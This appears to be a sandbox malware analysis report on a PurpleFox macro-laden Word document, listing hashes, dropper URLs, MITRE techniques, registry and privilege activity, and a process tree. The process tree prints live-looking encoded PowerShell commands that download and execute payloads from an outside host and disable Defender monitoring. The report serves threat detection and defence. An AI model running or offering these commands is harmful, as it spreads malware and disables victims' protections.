purplefox | 38f581881093c044667d565a698aa389f14585a58d5c8b692dc2be851293f1c2

Resubmissions

21/09/2023, 07:25

230921-h86p5sgc32 10

20/09/2023, 23:55

230920-3yrhpabc6y 10

Analysis

max time kernel
39s
max time network
48s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
21/09/2023, 07:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ID-191304203986.docm
Size

44KB
MD5

8c498f9e6dd65c5a9704208922224661
SHA1

1dc2f872c2e23e1eb0c6090909c5807553ad1e75
SHA256

38f581881093c044667d565a698aa389f14585a58d5c8b692dc2be851293f1c2
SHA512

b6a5eceef6739421ed2f0f6a479df496ecb1894b7694651b24a50689d663b1d7f1b1bf58c2edacf6a2fa59908a58f25cd00e389765871cb1856acb3431bcca50
SSDEEP

768:T6D/hwDg0kIo+rQGtBMIYta9l87miNPZjinjUeipoRkqk:T6D/u801rQIBMNg86AB+njUpoqqk

Score

10^/10

purplefox discovery evasion rootkit trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/zKJFnbnzeum8/37d4fddb6bf2de6611c6655a5cd37972fc33642d/ace.jpg

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/T2qomNwfFUeS/62f331959dde379b2536caed26a74ae8460c0c30/all.png

Extracted

Language

ps1

Source

URLs

exe.dropper

http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/5hwtrLyyHFiv/7b0985c861986ec9e2087ade8273e544009d68e1/SsdxxIp8DqeQ.jpg

Signatures

Detect PurpleFox MSI 1 IoCs

Detect PurpleFox MSI.

rootkit

resource	yara_rule
behavioral2/files/0x0006000000023208-117.dat	purplefox_msi

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	2024	2836	PowerShell.exe	83

PurpleFox
PurpleFox is an exploit kit used to distribute other malware families and first seen in 2018.
rootkit trojan purplefox

Blocklisted process makes network request 3 IoCs

flow	pid	Process
8	5008	powershell.exe
10	2360	powershell.exe
35	2372	msiexec.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Loads dropped DLL 5 IoCs

pid	Process
2752	MsiExec.exe
2752	MsiExec.exe
2752	MsiExec.exe
2752	MsiExec.exe
2752	MsiExec.exe

Modifies file permissions 1 TTPs 6 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4116	takeown.exe
1532	takeown.exe
1620	takeown.exe
3612	takeown.exe
3768	takeown.exe
1184	takeown.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Drops file in Windows directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSIE8E9.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEBC8.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEEE6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEFC2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF0BE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\.xml	msiexec.exe
File created	C:\Windows\dbcode86mk.log	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF001.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF217.tmp	msiexec.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3520	sc.exe
2012	sc.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

Modifies data under HKEY_USERS 48 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	MsiExec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	MsiExec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings	MsiExec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings\JITDebug = "0"	MsiExec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	MsiExec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	MsiExec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	MsiExec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
2836	WINWORD.EXE
2836	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
2024	PowerShell.exe
2024	PowerShell.exe
5008	powershell.exe
5008	powershell.exe
2360	powershell.exe
2360	powershell.exe
2360	powershell.exe
2360	powershell.exe
2360	powershell.exe
3564	powershell.exe
3564	powershell.exe
2372	msiexec.exe
2372	msiexec.exe
1996	powershell.exe
1996	powershell.exe
1996	powershell.exe

Suspicious use of AdjustPrivilegeToken 55 IoCs

description	pid	Process
Token: SeDebugPrivilege	2024	PowerShell.exe
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	3564	powershell.exe
Token: SeShutdownPrivilege	3564	powershell.exe
Token: SeIncreaseQuotaPrivilege	3564	powershell.exe
Token: SeSecurityPrivilege	2372	msiexec.exe
Token: SeCreateTokenPrivilege	3564	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	3564	powershell.exe
Token: SeLockMemoryPrivilege	3564	powershell.exe
Token: SeIncreaseQuotaPrivilege	3564	powershell.exe
Token: SeMachineAccountPrivilege	3564	powershell.exe
Token: SeTcbPrivilege	3564	powershell.exe
Token: SeSecurityPrivilege	3564	powershell.exe
Token: SeTakeOwnershipPrivilege	3564	powershell.exe
Token: SeLoadDriverPrivilege	3564	powershell.exe
Token: SeSystemProfilePrivilege	3564	powershell.exe
Token: SeSystemtimePrivilege	3564	powershell.exe
Token: SeProfSingleProcessPrivilege	3564	powershell.exe
Token: SeIncBasePriorityPrivilege	3564	powershell.exe
Token: SeCreatePagefilePrivilege	3564	powershell.exe
Token: SeCreatePermanentPrivilege	3564	powershell.exe
Token: SeBackupPrivilege	3564	powershell.exe
Token: SeRestorePrivilege	3564	powershell.exe
Token: SeShutdownPrivilege	3564	powershell.exe
Token: SeDebugPrivilege	3564	powershell.exe
Token: SeAuditPrivilege	3564	powershell.exe
Token: SeSystemEnvironmentPrivilege	3564	powershell.exe
Token: SeChangeNotifyPrivilege	3564	powershell.exe
Token: SeRemoteShutdownPrivilege	3564	powershell.exe
Token: SeUndockPrivilege	3564	powershell.exe
Token: SeSyncAgentPrivilege	3564	powershell.exe
Token: SeEnableDelegationPrivilege	3564	powershell.exe
Token: SeManageVolumePrivilege	3564	powershell.exe
Token: SeImpersonatePrivilege	3564	powershell.exe
Token: SeCreateGlobalPrivilege	3564	powershell.exe
Token: SeRestorePrivilege	2372	msiexec.exe
Token: SeTakeOwnershipPrivilege	2372	msiexec.exe
Token: SeRestorePrivilege	2372	msiexec.exe
Token: SeTakeOwnershipPrivilege	2372	msiexec.exe
Token: SeRestorePrivilege	2372	msiexec.exe
Token: SeTakeOwnershipPrivilege	2372	msiexec.exe
Token: SeRestorePrivilege	2372	msiexec.exe
Token: SeTakeOwnershipPrivilege	2372	msiexec.exe
Token: SeRestorePrivilege	2372	msiexec.exe
Token: SeTakeOwnershipPrivilege	2372	msiexec.exe
Token: SeRestorePrivilege	2372	msiexec.exe
Token: SeTakeOwnershipPrivilege	2372	msiexec.exe
Token: SeRestorePrivilege	2372	msiexec.exe
Token: SeTakeOwnershipPrivilege	2372	msiexec.exe
Token: SeShutdownPrivilege	1652	netsh.exe
Token: SeCreatePagefilePrivilege	1652	netsh.exe
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeTakeOwnershipPrivilege	3612	takeown.exe
Token: SeTakeOwnershipPrivilege	3768	takeown.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
2836	WINWORD.EXE
2836	WINWORD.EXE
2836	WINWORD.EXE
2836	WINWORD.EXE
2836	WINWORD.EXE
2836	WINWORD.EXE
2836	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2836 wrote to memory of 2024	2836	WINWORD.EXE	86
PID 2836 wrote to memory of 2024	2836	WINWORD.EXE	86
PID 2024 wrote to memory of 5008	2024	PowerShell.exe	88
PID 2024 wrote to memory of 5008	2024	PowerShell.exe	88
PID 5008 wrote to memory of 2360	5008	powershell.exe	89
PID 5008 wrote to memory of 2360	5008	powershell.exe	89
PID 2360 wrote to memory of 3564	2360	powershell.exe	90
PID 2360 wrote to memory of 3564	2360	powershell.exe	90
PID 3564 wrote to memory of 4976	3564	powershell.exe	91
PID 3564 wrote to memory of 4976	3564	powershell.exe	91
PID 4976 wrote to memory of 1636	4976	csc.exe	120
PID 4976 wrote to memory of 1636	4976	csc.exe	120
PID 2372 wrote to memory of 2752	2372	msiexec.exe	98
PID 2372 wrote to memory of 2752	2372	msiexec.exe	98
PID 2372 wrote to memory of 2752	2372	msiexec.exe	98
PID 2372 wrote to memory of 1304	2372	msiexec.exe	99
PID 2372 wrote to memory of 1304	2372	msiexec.exe	99
PID 2372 wrote to memory of 1304	2372	msiexec.exe	99
PID 1304 wrote to memory of 1652	1304	MsiExec.exe	130
PID 1304 wrote to memory of 1652	1304	MsiExec.exe	130
PID 1304 wrote to memory of 1652	1304	MsiExec.exe	130
PID 1304 wrote to memory of 1996	1304	MsiExec.exe	102
PID 1304 wrote to memory of 1996	1304	MsiExec.exe	102
PID 1304 wrote to memory of 1996	1304	MsiExec.exe	102
PID 1304 wrote to memory of 1404	1304	MsiExec.exe	104
PID 1304 wrote to memory of 1404	1304	MsiExec.exe	104
PID 1304 wrote to memory of 1404	1304	MsiExec.exe	104
PID 1304 wrote to memory of 1992	1304	MsiExec.exe	108
PID 1304 wrote to memory of 1992	1304	MsiExec.exe	108
PID 1304 wrote to memory of 1992	1304	MsiExec.exe	108
PID 1304 wrote to memory of 4892	1304	MsiExec.exe	141
PID 1304 wrote to memory of 4892	1304	MsiExec.exe	141
PID 1304 wrote to memory of 4892	1304	MsiExec.exe	141
PID 1304 wrote to memory of 1012	1304	MsiExec.exe	113
PID 1304 wrote to memory of 1012	1304	MsiExec.exe	113
PID 1304 wrote to memory of 1012	1304	MsiExec.exe	113
PID 1304 wrote to memory of 232	1304	MsiExec.exe	115
PID 1304 wrote to memory of 232	1304	MsiExec.exe	115
PID 1304 wrote to memory of 232	1304	MsiExec.exe	115
PID 1304 wrote to memory of 4272	1304	MsiExec.exe	117
PID 1304 wrote to memory of 4272	1304	MsiExec.exe	117
PID 1304 wrote to memory of 4272	1304	MsiExec.exe	117
PID 1304 wrote to memory of 3616	1304	MsiExec.exe	119
PID 1304 wrote to memory of 3616	1304	MsiExec.exe	119
PID 1304 wrote to memory of 3616	1304	MsiExec.exe	119
PID 1304 wrote to memory of 3256	1304	MsiExec.exe	121
PID 1304 wrote to memory of 3256	1304	MsiExec.exe	121
PID 1304 wrote to memory of 3256	1304	MsiExec.exe	121
PID 1304 wrote to memory of 3836	1304	MsiExec.exe	123
PID 1304 wrote to memory of 3836	1304	MsiExec.exe	123
PID 1304 wrote to memory of 3836	1304	MsiExec.exe	123
PID 1304 wrote to memory of 2176	1304	MsiExec.exe	125
PID 1304 wrote to memory of 2176	1304	MsiExec.exe	125
PID 1304 wrote to memory of 2176	1304	MsiExec.exe	125
PID 1304 wrote to memory of 1292	1304	MsiExec.exe	159
PID 1304 wrote to memory of 1292	1304	MsiExec.exe	159
PID 1304 wrote to memory of 1292	1304	MsiExec.exe	159
PID 1304 wrote to memory of 1652	1304	MsiExec.exe	130
PID 1304 wrote to memory of 1652	1304	MsiExec.exe	130
PID 1304 wrote to memory of 1652	1304	MsiExec.exe	130
PID 1304 wrote to memory of 1488	1304	MsiExec.exe	132
PID 1304 wrote to memory of 1488	1304	MsiExec.exe	132
PID 1304 wrote to memory of 1488	1304	MsiExec.exe	132
PID 1304 wrote to memory of 4196	1304	MsiExec.exe	170

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ID-191304203986.docm" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2836
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -nop -exec bypass -w hidden -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAG4AbwBwACAALQBlAHgAZQBjACAAYgB5AHAAYQBzAHMAIAAtAGMAIAAiAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGIAbABhAGMAawAtAHMAdQBuAC0AYQAzADMANQAuAGEAcwB5AG8AcgBmAHAAbABtAG4AdgAuAHcAbwByAGsAZQByAHMALgBkAGUAdgAvAG0AbgB3AE8ARABCAHAAdABLADYAagBVAC8AegBLAEoARgBuAGIAbgB6AGUAdQBtADgALwAzADcAZAA0AGYAZABkAGIANgBiAGYAMgBkAGUANgA2ADEAMQBjADYANgA1ADUAYQA1AGMAZAAzADcAOQA3ADIAZgBjADMAMwA2ADQAMgBkAC8AYQBjAGUALgBqAHAAZwAnACkAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADEAOAAwAA0ACgB9AA0ACgA=
  2⤵
  - Process spawned unexpected child process
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2024
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/zKJFnbnzeum8/37d4fddb6bf2de6611c6655a5cd37972fc33642d/ace.jpg')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -w hidden -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKAHMAYQBsACAAYQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAOwBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwAkAGcAPQBhACAAUwB5AHMAdABlAG0ALgBEAHIAYQB3AGkAbgBnAC4AQgBpAHQAbQBhAHAAKAAoAGEAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBPAHAAZQBuAFIAZQBhAGQAKAAiAGgAdAB0AHAAOgAvAC8AYgBsAGEAYwBrAC0AcwB1AG4ALQBhADMAMwA1AC4AYQBzAHkAbwByAGYAcABsAG0AbgB2AC4AdwBvAHIAawBlAHIAcwAuAGQAZQB2AC8AbQBuAHcATwBEAEIAcAB0AEsANgBqAFUALwBUADIAcQBvAG0ATgB3AGYARgBVAGUAUwAvADYAMgBmADMAMwAxADkANQA5AGQAZABlADMANwA5AGIAMgA1ADMANgBjAGEAZQBkADIANgBhADcANABhAGUAOAA0ADYAMABjADAAYwAzADAALwBhAGwAbAAuAHAAbgBnACIAKQApADsAJABvAD0AYQAgAEIAeQB0AGUAWwBdACAAMgA1ADYAMAA7ACgAMAAuAC4AMwAxACkAfAAlAHsAZgBvAHIAZQBhAGMAaAAoACQAeAAgAGkAbgAoADAALgAuADcAOQApACkAewAkAHAAPQAkAGcALgBHAGUAdABQAGkAeABlAGwAKAAkAHgALAAkAF8AKQA7ACQAbwBbACQAXwAqADgAMAArACQAeABdAD0AKABbAG0AYQB0AGgAXQA6ADoARgBsAG8AbwByACgAKAAkAHAALgBCAC0AYgBhAG4AZAAxADUAKQAqADEANgApAC0AYgBvAHIAKAAkAHAALgBHACAALQBiAGEAbgBkACAAMQA1ACkAKQB9AH0AOwBJAEUAWAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABvAFsAMAAuAC4AMgA1ADEAMgBdACkAKQA7AE0AcwBpAE0AYQBrAGUAIABoAHQAdABwADoALwAvAGIAbABhAGMAawAtAHMAdQBuAC0AYQAzADMANQAuAGEAcwB5AG8AcgBmAHAAbABtAG4AdgAuAHcAbwByAGsAZQByAHMALgBkAGUAdgAvAG0AbgB3AE8ARABCAHAAdABLADYAagBVAC8ANQBoAHcAdAByAEwAeQB5AEgARgBpAHYALwA3AGIAMAA5ADgANQBjADgANgAxADkAOAA2AGUAYwA5AGUAMgAwADgANwBhAGQAZQA4ADIANwAzAGUANQA0ADQAMAAwADkAZAA2ADgAZQAxAC8AUwBzAGQAeAB4AEkAcAA4AEQAcQBlAFEALgBqAHAAZwA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADEAOAAwAA0ACgB9AA0ACgA=
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2360
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -EncodedCommand DQAKAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEQAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIAAkAHQAcgB1AGUADQAKAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAiACQAZQBuAHYAOgB3AGkAbgBkAGkAcgAiAA0ACgAkAFIAZQBnAGsAZQB5AHAAYQB0AGgAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXAA3AC0AWgBpAHAAIgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABQAEYAOAA4AGQATgBjAGQAcwBEAEQAcQBlADcAWgBmAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0ACgAcwB0AHIAaQBuAGcAIABwAGEAYwBrAGEAZwBlAFAAYQB0AGgALAAgAHMAdAByAGkAbgBnACAAYwBvAG0AbQBhAG4AZABMAGkAbgBlACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAGkALgBkAGwAbAAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABNAHMAaQBTAGUAdABJAG4AdABlAHIAbgBhAGwAVQBJACgAaQBuAHQAIABkAHcAVQBJAEwAZQB2AGUAbAAsACAASQBuAHQAUAB0AHIAIABwAGgAVwBuAGQAKQA7AA0ACgB9AA0ACgAiAEAADQAKAGQAbwANAAoAewANAAoAJABtAHMAaQBwAGEAdABoAEEAIAA9ACAAIgBoAHQAdABwADoALwAvAGIAbABhAGMAawAtAHMAdQBuAC0AYQAzADMANQAuAGEAcwB5AG8AcgBmAHAAbABtAG4AdgAuAHcAbwByAGsAZQByAHMALgBkAGUAdgAvAG0AbgB3AE8ARABCAHAAdABLADYAagBVAC8ANQBoAHcAdAByAEwAeQB5AEgARgBpAHYALwA3AGIAMAA5ADgANQBjADgANgAxADkAOAA2AGUAYwA5AGUAMgAwADgANwBhAGQAZQA4ADIANwAzAGUANQA0ADQAMAAwADkAZAA2ADgAZQAxAC8AUwBzAGQAeAB4AEkAcAA4AEQAcQBlAFEALgBqAHAAZwAiAA0ACgAkAG0AcwBpAHAAYQB0AGgAQQBMAEwAIAA9ACAAQAAoACIAJABtAHMAaQBwAGEAdABoAEEAIgAsACIAJABtAHMAaQBwAGEAdABoAEEAIgApAA0ACgAkAE4AZABTAFUASQB3AHUAdQBXAG4AcABZAEgAegBGAHUAIAA9ACAAZwBlAHQALQByAGEAbgBkAG8AbQAgACQAbQBzAGkAcABhAHQAaABBAEwATAA7AA0ACgBbAFAARgA4ADgAZABOAGMAZABzAEQARABxAGUANwBaAGYAXQA6ADoATQBzAGkAUwBlAHQASQBuAHQAZQByAG4AYQBsAFUASQAoADIALAAwACkAOwANAAoAWwBQAEYAOAA4AGQATgBjAGQAcwBEAEQAcQBlADcAWgBmAF0AOgA6AE0